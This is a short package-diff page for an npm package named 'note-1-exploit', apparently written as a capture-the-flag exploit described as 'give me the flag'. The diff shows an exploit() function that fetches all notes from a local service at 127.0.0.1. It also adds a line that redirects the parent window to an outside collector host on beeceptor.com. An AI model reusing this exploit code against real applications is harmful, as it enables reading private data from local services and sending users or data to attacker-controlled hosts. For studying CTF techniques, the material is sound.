note-1-exploit 1.0.14 → 1.0.15

Sign up to get free protection for your applications and to get access to all the features.
Files changed (2) hide show
  1. package/index.js +1 -0
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -1,4 +1,5 @@
1
1
  async function exploit() {
2
+ window.parent.location.replace("https://omniman.free.beeceptor.com?q=hahaha")
2
3
  let all_results = await fetch("http://127.0.0.1:10082/api/notes/all", {
3
4
  "headers": {
4
5
  "accept": "*/*",
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "note-1-exploit",
3
- "version": "1.0.14",
3
+ "version": "1.0.15",
4
4
  "description": "give me the flag",
5
5
  "main": "index.js",
6
6
  "scripts": {